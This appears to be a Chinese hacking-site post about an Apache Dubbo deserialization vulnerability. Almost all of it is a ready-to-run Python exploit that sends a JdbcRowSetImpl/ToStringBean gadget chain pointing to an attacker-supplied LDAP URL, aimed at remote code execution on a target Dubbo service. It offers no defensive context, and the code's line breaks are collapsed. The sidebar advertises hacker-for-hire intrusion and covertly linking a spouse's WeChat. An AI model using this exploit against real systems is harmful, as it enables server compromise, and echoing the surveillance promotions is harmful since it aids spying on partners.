Apache Dubbo反序列化漏洞

访客4年前 (2021-03-30)黑客文章840

# -*- coding: utf-8 -*-importsys fromdubbo.codec.hessian2 importDecoder,new_object fromdubbo.client importDubboClient iflen(sys.argv)<4:print('Usage: python {} DUBBO_HOST DUBBO_PORT LDAP_URL'.format(sys.argv[0]))print(' Example: - python {} 1.1.1.1 12345 ldap://1.1.1.6:80/exp'.format(sys.argv[0]))sys.exit()client =DubboClient(sys.argv[1],int(sys.argv[2]))JdbcRowSetImpl=new_object('com.sun.rowset.JdbcRowSetImpl',dataSource=sys.argv[3],strMatchColumns=["foo"])JdbcRowSetImplClass=new_object('java.lang.Class',name="com.sun.rowset.JdbcRowSetImpl",)toStringBean=new_object('com.rometools.rome.feed.impl.ToStringBean',beanClass=JdbcRowSetImplClass,obj=JdbcRowSetImpl )resp =client.send_request_and_return_response(service_name='org.apache.dubbo.spring.boot.sample.consumer.DemoService',# 此处可以是 $invoke、$invokeSync、$echo 等，通杀 2.7.7 及 CVE 公布的所有版本。method_name='$invoke',args=[toStringBean])output =str(resp)if'Fail to decode request due to: RpcInvocation'inoutput:print('[!] Target maybe not support deserialization.')elif'EXCEPTION: Could not complete class com.sun.rowset.JdbcRowSetImpl.toString()'inoutput:print('[+] Succeed.')else:print('[!] Output:')print(output)print('[!] Target maybe not use dubbo-remoting library.')

标签: Apache Dubbo反序列化漏洞

返回列表

上一篇：三顾茅庐的主要内容（三顾茅庐赏析）

下一篇：浮躁的意思（你真的知道什么是浮躁吗）

找黑客平台

Apache Dubbo反序列化漏洞

相关文章

杨妈火锅挣钱吗？加盟优势多利润丰厚

腾讯文档中的word文档怎么快速清除格式,腾讯文档教程

那里能找到黑客妙手协助,阿里巴巴最牛黑客是谁

黑客接单入侵_网贷找黑客

怎样偷偷关联老婆微信&mdash;2个微信号怎么关联？

删除好友后怎么恢复聊天记录（微信误删聊天记

Copyright Your WebSite.Some Rights Reserved.

Hacker by Hacker.

找黑客平台

Apache Dubbo反序列化漏洞

相关文章

杨妈火锅挣钱吗？加盟优势多利润丰厚

腾讯文档中的word文档怎么快速清除格式,腾讯文档教程

那里能找到黑客妙手协助,阿里巴巴最牛黑客是谁

黑客接单入侵_网贷找黑客

怎样偷偷关联老婆微信&amp;mdash;2个微信号怎么关联？

删除好友后怎么恢复聊天记录（微信误删聊天记

Copyright Your WebSite.Some Rights Reserved.

Hacker by Hacker.

怎样偷偷关联老婆微信—2个微信号怎么关联？